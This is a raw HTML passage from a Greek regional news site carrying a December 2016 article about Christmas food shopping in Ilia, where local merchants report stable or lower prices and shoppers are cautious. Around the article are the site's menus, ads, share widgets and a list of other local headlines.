style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -512px;padding-left:18px;">Slovenian</option><option value="el|es" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -352px;padding-left:18px;">Spanish</option><option value="el|sw" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -720px;padding-left:18px;">Swahili</option><option value="el|sv" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -368px;padding-left:18px;">Swedish</option><option value="el|th" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -640px;padding-left:18px;">Thai</option><option value="el|tr" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -656px;padding-left:18px;">Turkish</option><option value="el|uk" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -528px;padding-left:18px;">Ukrainian</option><option value="el|ur" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -912px;padding-left:18px;">Urdu</option><option value="el|vi" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -544px;padding-left:18px;">Vietnamese</option><option value="el|cy" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -752px;padding-left:18px;">Welsh</option><option value="el|yi" style="background:url('/sites/all/modules/gtranslate/gtranslate-files/16l.png') no-repeat scroll 0 -816px;padding-left:18px;">Yiddish</option></select> </div>
</div>
 
</div>
</div>
<div id="logo">
<div id="date"></div>
<h1 style="background-image:url('/sites/all/themes/patrisnewtheme/images/LOGOOOxmas17.png')"><a href="/" title="Patrisnews">Patrisnews</a></h1>
</div>
<nav id="top">
 
<div id="block-block-219" class="block block-block">
<div class="content">
<p><a style="text-decoration: underline; font-size: 13.008px;" href="https://www.deliveras.gr/search.php?state=%CE%A0%CF%8D%CF%81%CE%B3%CE%BF%CF%82&amp;lat=37.673012&amp;lng=21.43807609999999" target="_blank"><img class="null" src="/sites/default/files/970x90.gif" alt="" width="970" height="90"/></a></p>
</div>
</div>
<ul id="superfish-1" class="menu sf-menu sf-menu-main-menu-middle-up sf-horizontal sf-style-none sf-total-items-12 sf-parent-items-0 sf-single-items-12"><li id="menu-455-1" class="first odd sf-item-1 sf-depth-1 sf-no-children"><a href="/" title="Description of vi." class="sf-depth-1">Αρχική</a></li><li id="menu-461-1" class="middle even sf-item-2 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/ileia" title="Description of jese." class="sf-depth-1">ΗΛΕΙΑ</a></li><li id="menu-458-1" class="middle odd sf-item-3 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/peloponnisos" title="Description of swoj." class="sf-depth-1">ΠΕΛΟΠΟΝΝΗΣΟΣ</a></li><li id="menu-452-1" class="middle even sf-item-4 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/ellada" title="Description of dresw." class="sf-depth-1">ΕΛΛΑΔΑ</a></li><li id="menu-460-1" class="middle odd sf-item-5 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/kosmos" title="Description of cepran." class="sf-depth-1">ΚΟΣΜΟΣ</a></li><li id="menu-963-1" class="middle even sf-item-6 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/omogeneia" class="sf-depth-1">ΟΜΟΓΕΝΕΙΑ</a></li><li id="menu-454-1" class="middle odd sf-item-7 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/politiki" title="Description of kat." class="sf-depth-1">ΠΟΛΙΤΙΚΗ</a></li><li id="menu-965-1" class="middle even sf-item-8 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/arthrografia" class="sf-depth-1">ΑΡΘΡΟΓΡΑΦΙΑ</a></li><li id="menu-469-1" class="middle odd sf-item-9 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/oikonomia" title="Description of frin." class="sf-depth-1">ΟΙΚΟΝΟΜΙΑ</a></li><li id="menu-526-1" class="middle even sf-item-10 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/politismos" class="sf-depth-1">ΠΟΛΙΤΙΣΜΟΣ</a></li><li id="menu-525-1" class="middle odd sf-item-11 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/agrotika" class="sf-depth-1">ΑΓΡΟΤΙΚΑ</a></li><li id="menu-964-1" class="last even sf-item-12 sf-depth-1 sf-no-children"><a href="/kairos-peloponissoy" class="sf-depth-1">ΚΑΙΡΟΣ</a></li></ul>  
</nav>
<nav id="down">
 
<div id="block-superfish-2" class="block block-superfish">
<div class="content">
<ul id="superfish-2" class="menu sf-menu sf-menu-main-menu-middle-down sf-horizontal sf-style-none sf-total-items-11 sf-parent-items-0 sf-single-items-11"><li id="menu-457-2" class="first odd sf-item-1 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/athlitismos" title="Description of brotr." class="sf-depth-1">ΑΘΛΗΤΙΣΜΟΣ</a></li><li id="menu-465-2" class="middle even sf-item-2 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/lifestyle" title="Description of ba." class="sf-depth-1">LIFESTYLE</a></li><li id="menu-966-2" class="middle odd sf-item-3 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/sexy" class="sf-depth-1">SEXY</a></li><li id="menu-456-2" class="middle even sf-item-4 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/gynaika" title="Description of tre." class="sf-depth-1">ΓΥΝΑΙΚΑ</a></li><li id="menu-462-2" class="middle odd sf-item-5 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/ygeia" title="Description of fru." class="sf-depth-1">ΥΓΕΙΑ</a></li><li id="menu-471-2" class="middle even sf-item-6 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/geyseis" title="Description of totrep." class="sf-depth-1">ΓΕΥΣΕΙΣ</a></li><li id="menu-468-2" class="middle odd sf-item-7 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/paraxena" title="Description of tra." class="sf-depth-1">ΠΕΡΙΕΡΓΑ</a></li><li id="menu-470-2" class="middle even sf-item-8 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/tehnologia" title="Description of thepi." class="sf-depth-1">ΤΕΧΝΟΛΟΓΙΑ</a></li><li id="menu-459-2" class="middle odd sf-item-9 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/perivallon" title="Description of hu." class="sf-depth-1">ΠΕΡΙΒΑΛΛΟΝ</a></li><li id="menu-967-2" class="middle even sf-item-10 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/ekpaideysi" class="sf-depth-1">ΕΚΠΑΙΔΕΥΣΗ</a></li><li id="menu-464-2" class="last odd sf-item-11 sf-depth-1 sf-no-children"><a href="/nea-enimerosi/katanalotes" title="Description of pre." class="sf-depth-1">ΚΑΤΑΝΑΛΩΤΕΣ</a></li></ul> </div>
</div>
 
</nav>
</header>
<div id="content-pages">
<div id="banner-top">
 
<div id="block-block-177" class="block block-block">
<div class="content">
<p><a href="http://xanthoulhs.gr/" target="_blank"><img class="null" src="/sites/default/files/miele_pointamaliada_f-web-01.jpg" alt="" width="728" height="90"/></a></p>
</div>
</div>
<div id="block-block-157" class="block block-block">
<div class="content">
<p><a href="http://www.karaflos.gr/" target="_blank"><img class="null" src="/sites/default/files/output_7arsgq.gif" alt="" width="240" height="90"/></a></p>
</div>
</div>
<div id="block-block-118" class="block block-block">
<div class="content">
<div></div> </div>
</div>
 
</div>
<div class="ver-seperator"></div>
<section class="eight-col stripe-right col main-content ">
<span class="title">Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι</span>
<div class="" style="clear:both; width: 100%;"></div>
<div style="clear:both;"></div>
 
<div id="block-system-main" class="block block-system">
<div class="content">
<h3 class="news_small_title">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></h3>
<h1 class="news_large_title">Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι</h1>
<div class="date"> <span style="margin-right:5px;"><h5 style="display:inline; margin-left:3px;">
ΑΡΙΣΤΗ ΠΟΙΟΤΗΤΑ ΚΑΙ ΠΡΟΣΙΤΕΣ ΟΙ ΤΙΜΕΣ ΣΤΑ ΚΑΤΑΣΤΗΜΑΤΑ </h5></span> (23/12/2016 12:31)</div>
<div class="main-article">
<div class="main-image">
<a href="http://www.patrisnews.com/sites/default/files/field/news/image/kreopwleio.jpg" title="Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι" class="colorbox" rel="gallery-node-182700"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/655x385/public/field/news/image/kreopwleio.jpg" width="655" height="385" alt="" title=""/></a></div>
<div id="block-block-94" class="block block-block">
<div class="content">
<div style="float:left; margin-left:0px; width:248px; padding-top:10px; ">
 
<div class="addthis_toolbox addthis_default_style ">
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
<a class="addthis_button_tweet"></a>
 
</div>
<script type="text/javascript">var addthis_config = {"data_track_addressbar":true};</script>
<script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=stavrosgian"></script>
 
</div>
  </div>
</div>
<div class="field field-name-field-addthis field-type-addthis field-label-hidden">
<div class="addthis_toolbox addthis_default_style addthis_32x32_style " addthis:title="Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι - Patris News :: Εφημερίδα Πατρίς, τα νέα της Ηλείας, ειδήσεις από την Ηλεία, Ηλειακά blogs, Ηλεικά νέα, ilia news, news " addthis:url="http://www.patrisnews.com/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi"><a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_facebook"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_twitter"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_google_plusone_share"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_linkedin"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_pinterest"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_digg"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_gmail"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_myspace"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_netvibes"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_tumblr"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_twitthis"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_"></a>
</div>
</div>
<div class="xorisma"></div>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;"> Πλουσιότερο αλλά πιο…οικονομικό θα είναι φέτος <strong>το Χριστουγεννιάτικο τραπέζι των Ηλείων</strong>, αφού <strong>οι</strong> <strong>τιμές των προϊόντων</strong> - σύμφωνα με τους επαγγελματίες της περιοχής - είτε παραμένουν σταθερές είτε έχουν μειωθεί σημαντικά, προκειμένου να μπορέσει ο κόσμος να αγοράσει τα απαραίτητα για το Χριστουγεννιάτικο τραπέζι αλλά και να κινηθεί η αγορά που αυτές τις ημέρες έχει την «τιμητική» της, αφού οι Έλληνες, θέλουν το<strong> γιορτινό τραπέζι </strong>γύρω από το οποίο θα συγκεντρωθεί η οικογένεια, να είναι όσο πιο «πλούσιο» γίνεται.</span></p>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;">Οι <strong>καταναλωτές</strong> άρχισαν δειλά – δειλά να κάνουν τις πρώτες αγορές για το Χριστουγεννιάτικο τραπέζι, από την αρχή της εβδομάδας, αλλά πάντα με μέτρο και σύμφωνα με όσα χρήματα έχουν απομείνει στην τσέπη, αφού πρώτα έχουν τακτοποιήσουν τις υπόλοιπες υποχρεώσεις και εκκρεμότητες. </span></p>
<p style="text-align: left;" align="center"><span style="font-family: verdana, geneva; font-size: small;"><strong>Η κίνηση</strong></span></p>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;"><strong>Η κίνηση στα καταστήματα</strong> με είδη τροφίμων της περιοχής μέχρι και την Τρίτη ήταν υποτονική, ενώ από χθες – κι αφού έχουν πια πληρωθεί συντάξεις, δώρα και επιδόματα – άρχισε να αυξάνεται. Οι επαγγελματίες, ελπίζουν ότι σήμερα Παρασκευή και αύριο Σάββατο, παραμονή των Χριστουγέννων, ο κόσμος θα βγει στην αγορά για να ψωνίσει τα απαραίτητα για το γιορτινό τραπέζι που και φέτος θα συγκεντρώσει τους περισσότερους, αφού το Χριστουγεννιάτικο ρεβεγιόν εκτός σπιτιού, για τους περισσότερους, είναι πια παρελθόν.</span></p>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;"><img src="/sites/default/files/traozgfs.jpg" alt=""/></span></p>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;">Παρά τις δυσκολίες ωστόσο, οι καταναλωτές, γι’ αυτή τη μέρα κάνουν μια μικρή «υπέρβαση» η οποία βέβαια δεν ξεφεύγει από τα οικονομικά όρια των δυνατοτήτων κάθε οικογένειας. Αγοράζει παραπάνω από ένα κρέας και συνοδευτικά για το τραπέζι, ώστε να υπάρχει ποικιλία, αλλά, σε μικρότερες ποσότητες πάντα, ώστε, ούτε να λείψει, ούτε όμως και να περισσέψει, όπως γινόταν παλιά.</span></p>
<p style="text-align: left;" align="center"><span style="font-family: verdana, geneva; font-size: small;"><strong>Με σταθερές και χαμηλότερες τιμές</strong></span></p>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;">Όσον αφορά τις τιμές, στα περισσότερα προϊόντα παραμένουν σταθερές εδώ και πολλά χρόνια, ενώ υπάρχουν και κατηγορίες προϊόντων που παρουσιάζουν μείωση, όπως η τιμή του αρνιού. Οι επαγγελματίες έχουν κάνει προσπάθεια να «ρίξουν» όσο γίνεται τις τιμές, χωρίς όμως να κάνουν «έκπτωση» στην ποιότητα, προκειμένου να βοηθήσουν τον κόσμο να κάνει τις αγορές του για το Χριστουγεννιάτικο τραπέζι, έχοντας επίγνωση των οικονομικών δυσκολιών που αντιμετωπίζει όλος ο κόσμος. Και οι καταναλωτές από την πλευρά τους, τους ανταμείβουν με την εμπιστοσύνη και την προτίμησή τους.</span></p>
<p style="text-align: left;"><span style="font-family: verdana, geneva; font-size: small;"><br/></span></p>
<p style="text-align: left;" align="right"><span style="font-family: verdana, geneva; font-size: small;"><strong>Νάνσυ Σπυροπούλου</strong></span></p>
<p style="text-align: left;" align="right"><span style="font-family: verdana, geneva; font-size: small;"><strong>(</strong><a href="/cdn-cgi/l/email-protection#620c3d11121b100d120d170e0d17221b030a0d0d4c0510"><strong>n</strong><strong>_</strong><strong>spyropoulou</strong><strong>@</strong><strong>yahoo</strong><strong>.</strong><strong>gr</strong></a><strong>)</strong></span></p>
<div class="ver-seperator"></div>
<div style="padding-top:10px;">
 
<div class="view view-simpleads-block-example view-id-simpleads_block_example view-display-id-block_10 view-dom-id-26161d6c807c69a0a22115a35cd58bc9">
</div>  
</div>
<div class="view view-simpleads-block-example view-id-simpleads_block_example view-display-id-block_9 view-dom-id-bae3963f66f1dbee92e3301f2fd7aa67">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<a href="http://www.oleng.eu/" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/unnamed_1.gif" width="300" height="250" alt=""/></div></div></div></a>
</div>
</div>
<div class="ver-seperator"></div>
<div class="field field-name-field-addthis field-type-addthis field-label-hidden">
<div class="addthis_toolbox addthis_default_style addthis_32x32_style " addthis:title="Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε κόστος το Χριστουγεννιάτικο τραπέζι - Patris News :: Εφημερίδα Πατρίς, τα νέα της Ηλείας, ειδήσεις από την Ηλεία, Ηλειακά blogs, Ηλεικά νέα, ilia news, news " addthis:url="http://www.patrisnews.com/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi"><a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_facebook"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_twitter"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_google_plusone_share"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_linkedin"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_pinterest"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_digg"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_gmail"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_myspace"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_netvibes"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_tumblr"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_twitthis"></a>
<a href="http://www.addthis.com/bookmark.php?v=300" class="addthis_button_"></a>
</div>
</div>
<div class="title">
<h2 id="disqus_header">Σχολιάστε</h3>
</div>
<div id="disqus_thread"><noscript><p><a href="http://patrisnews.disqus.com/?url=http%3A%2F%2Fwww.patrisnews.com%2Fnea-enimerosi%2Fileia%2Fileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi">View the discussion thread.</a></p></noscript></div>
 
<div id="block-block-20" class="block block-block">
<div class="content">
<div id="SC_TBlock_142398" class="SC_TBlock">loading...</div>
<script type="text/javascript">
<!--//--><![CDATA[// ><!--
// <![CDATA[
var SC_CId = "142398",SC_Domain="n.ads2-adnow.com";SC_Start_142398=(new Date).getTime();
// ]]]]><![CDATA[>
//--><!]]>
</script><script type="text/javascript" src="http://st-n.ads2-adnow.com/js/adv_out.js"></script> </div>
</div>
 
<div class="ver-seperator"></div>
<div class="title"><h2>Τελευταίες ειδήσεις</h2></div>
<div class="view view-last-news-in-details view-id-last_news_in_details view-display-id-block view-dom-id-8e6c145a22c7f3ee0373ddd411a5a639">
<div class="views-row views-row-1 views-row-odd views-row-first">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/evdomadiaio-dromologio-kinitis-astynomikis-monadas-ileias-19"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/cache_650x650_1_310576.jpg" width="170" height="90" alt=""/></a>
<h3>
ΓΕΝΙΚΗ ΠΕΡΙΦΕΡΕΙΑΚΗ ΑΣΤΥΝΟΜΙΚΗ ΔΙΕΥΘΥΝΣΗ ΔΥΤΙΚΗΣ ΕΛΛΑΔΑΣ</h3>
<h2><a href="/nea-enimerosi/ileia/evdomadiaio-dromologio-kinitis-astynomikis-monadas-ileias-19">Εβδομαδιαίο Δρομολόγιο Κινητής Αστυνομικής Μονάδας Ηλείας</a></h2>
</header>
<div class="descr">Η Γενική Περιφερειακή Αστυνομική Διεύθυνση Δυτικής Ελλάδας, πληροφορεί τους πολίτες ότι η Κινητή Αστυνομική Μονάδα της Διεύθυνσης Αστυνομίας Ηλείας, την ερχόμενη εβδομάδα (26-12-2016 έως 01-01-2017), </div>
<footer>
<div class="date">23/12/2016 | 12:00 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-2 views-row-even">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/laikatzides-enantion-emporon-kai-arena-to-dimarheio-sta-lehaina"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/arena_lec.jpg" width="170" height="90" alt=""/></a>
<h3>
«ΟΧΙ» ΣΑΒΒΑΤΟ ΤΟ ΚΥΡΙΑΚΑΤΙΚΟ ΠΑΖΑΡΙ</h3>
<h2><a href="/nea-enimerosi/ileia/laikatzides-enantion-emporon-kai-arena-to-dimarheio-sta-lehaina">«Λαϊκατζήδες» εναντίον εμπόρων και… αρένα το δημαρχείο στα Λεχαινά!</a></h2>
</header>
<div class="descr">Σε αρένα μετετράπη η αίθουσα του δημοτικού συμβουλίου του Δήμου Ανδραβίδας Κυλλήνης ύστερα από την απόφαση για ανάκληση της προηγούμενης απόφασης περί λειτουργίας του Κυριακάτικου Παζαριού της Ν.</div>
<footer>
<div class="date">23/12/2016 | 05:59 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-3 views-row-odd">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/apostolos-katsifaras-erga-164-ekat-eyro-stin-ileia"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/katsifar_erga.jpg" width="170" height="90" alt=""/></a>
<h3>
ΠΕΡΙΦΕΡΕΙΑ ΔΥΤΙΚΗΣ ΕΛΛΑΔΑΣ</h3>
<h2><a href="/nea-enimerosi/ileia/apostolos-katsifaras-erga-164-ekat-eyro-stin-ileia">Απόστολος Κατσιφάρας: Έργα 164 εκατ. ευρώ στην Ηλεία</a></h2>
</header>
<div class="descr">Οραματικό εργαλείο η ΟΧΕ Κατάκολο-Πύργος-Αρχαία Ολυμπία τόνισε ο Απ. Κατσιφάρας σε ευρεία σύσκεψη στον Πύργο - Απαντήσεις για Ολυμπία Οδό και Λάσδικα-Κρυονέρι
</div>
<footer>
<div class="date">23/12/2016 | 05:31 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-4 views-row-even">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/pyrgos-agonas-me-to-hrono-gia-to-ergo-xystri"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/liatshs_xystrh.jpg" width="170" height="90" alt=""/></a>
<h3>
ΓΑΒΡΙΛΗΣ ΛΙΑΤΣΗΣ</h3>
<h2><a href="/nea-enimerosi/ileia/pyrgos-agonas-me-to-hrono-gia-to-ergo-xystri">Πύργος: Αγώνας με το χρόνο για το έργο «Ξυστρή»</a></h2>
</header>
<div class="descr">Την διακήρυξη για την μεταφορά των αιθουσών του 1ου Γενικού Λυκείου Πύργου που βρίσκονται στη νέα είσοδο του πρώην εργοστασίου Ξυστρή υπέγραψε χθες ο δήμαρχος του Πύργου</div>
<footer>
<div class="date">23/12/2016 | 05:14 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-5 views-row-odd">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/i-megali-giorti-tis-amaliadas-1"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/xristogsgsel.jpg" width="170" height="90" alt=""/></a>
<h3>
ΠΡΑΓΜΑΤΙΚΟΤΗΤΑ ΤΟ «3Ο ΑΓΑΠΗΣ ΔΕΝΔΡΟΝ»</h3>
<h2><a href="/nea-enimerosi/ileia/i-megali-giorti-tis-amaliadas-1">Η μεγάλη γιορτή της Αμαλιάδας!</a></h2>
</header>
<div class="descr">Μια μεγάλη γιορτή έχει στηθεί από χθες στην Αμαλιάδα και θα διαρκέσει έως το τέλος του μήνα, δίνοντας την ευκαιρία σε μικρούς και μεγάλους να υποδεχτούν με τον πλέον εορταστικό τρόπο τα Χριστούγεννα κ</div>
<footer>
<div class="date">22/12/2016 | 22:00 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-6 views-row-even">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/pyrgos-tha-stirixoyme-adynamoys-symmathites-mas"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/4545545216466578.jpg" width="170" height="90" alt=""/></a>
<h3>
ΤΟ ΧΡΙΣΤΟΥΓΙΕΝΝΙΑΤΙΚΟ ΜΑΘΗΤΙΚΟ ΠΑΖΑΡΙ ΑΠΟ ΤΑ ΣΧΟΛΕΙΑ ΤΟΥ ΠΥΡΓΟΥ ΣΤΟ ΠΑΡΚΟ ΣΠΚ</h3>
<h2><a href="/nea-enimerosi/ileia/pyrgos-tha-stirixoyme-adynamoys-symmathites-mas">Πύργος: Θα στηρίξουμε αδύναμους συμμαθητές μας...</a></h2>
</header>
<div class="descr">Ξεχωριστές δημιουργίες για τα Χριστούγεννα και με μοναδικό σκοπό την συγκέντρωση χρημάτων για να καλυφθούν οι ανάγκες των σχολείων τους, να στηρίξουν οικονομικά αδύναμους συμμαθητές τους ή να καταφέρο</div>
<footer>
<div class="date">22/12/2016 | 21:00 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-7 views-row-odd">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/skorpisan-hamogela-oi-mathites-toy-3oy-gymnasioy-amaliadas"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/eid_gymnas.jpg" width="170" height="90" alt=""/></a>
<h3>
ΕΓΙΝΑΝ ΜΙΑ ΜΕΓΑΛΗ ΑΓΚΑΛΙΑ</h3>
<h2><a href="/nea-enimerosi/ileia/skorpisan-hamogela-oi-mathites-toy-3oy-gymnasioy-amaliadas">Σκόρπισαν χαμόγελα οι μαθητές του 3ου Γυμνασίου Αμαλιάδας</a></h2>
</header>
<div class="descr">Μια μεγάλη αγκαλιά έγιναν χθες μαθητές του 3ου Γυμνασίου Αμαλιάδας και του ‘Φούφειου’ ειδικού σχολείου Αμαλιάδας, σε μία συμβολική κίνηση λίγο πριν τα Χριστούγεννα, στέλνοντας το δικό τους μήνυμα</div>
<footer>
<div class="date">22/12/2016 | 20:00 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
<div class="views-row views-row-8 views-row-even views-row-last">
<article class="list">
<header>
<a href="/nea-enimerosi/ileia/simadia-anakampsis-sti-deya-zaharos"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/last-news-in-details/public/field/news/image/deyaz.jpg" width="170" height="90" alt=""/></a>
<h3>
ΘΕΤΙΚΕΣ ΟΙ ΠΡΟΒΛΕΨΕΙΣ ΓΙΑ ΤΟ 2017</h3>
<h2><a href="/nea-enimerosi/ileia/simadia-anakampsis-sti-deya-zaharos">Σημάδια ανάκαμψης στη ΔΕΥΑ Ζαχάρως</a></h2>
</header>
<div class="descr">Βελτιωμένη είναι η εικόνα της ΔΕΥΑ Ζαχάρως προς το τέλος της χρονιάς, καθώς οι αρκετοί πολίτες έχουν ανταποκριθεί στις διαρκείς παρακλήσεις της διοίκησης της επιχειρήσης να πληρώσουν τις οφειλές τους</div>
<footer>
<div class="date">22/12/2016 | 19:00 - </div> <div class="category">
<a href="/nea-enimerosi/ileia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΗΛΕΙΑ</a></div>
</footer>
</article>
</div>
</div>
</div>
<script type="text/javascript">
(function($){
$(document).ready(function(){  
	$(".main-add-image").jCarouselLite({
       btnNext: ".next",
       btnPrev: ".prev"
    });
});  

$.ajax({
 url: "/statistics_ajax/update/" + 182700,
 type: "POST",
 dataTypeString: "text"
});

})(jQuery)
</script>
</div>
</div>
 
</section>
<aside class="three-and-half-col col ">
 
<div id="block-block-220" class="block block-block">
<div class="content">
<p><object width="300" height="250" data="http://www.patrisnews.com/sites/default/files//cosmote/300x250.swf" type="application/x-shockwave-flash"><param name="src" value="http://www.patrisnews.com/sites/default/files//cosmote/300x250.swf"/><a href="https://www.cosmote.gr/cosmotetv/new-campaign"><img src="http://www.patrisnews.com/sites/default/files//cosmote/mobile_backup_image.jpg" alt="Get Adobe Flash player"/></a></object></p>
</div>
</div>
<div class="view view-simpleads-block-example view-id-simpleads_block_example view-display-id-block_1 view-dom-id-f1c195016fe41012dd9b0a0a4c36f16e">
<div class="views-row views-row-1 views-row-odd views-row-first">
<a href="http://www.thilyzas.gr/" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/output_ad0twz.gif" width="300" height="140" alt=""/></div></div></div></a>
</div>
<div class="views-row views-row-2 views-row-even">
<a href="http://www.liberis-service.gr/" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/output_y4lwp3.gif" width="300" height="140" alt=""/></div></div></div></a>
</div>
<div class="views-row views-row-3 views-row-odd">
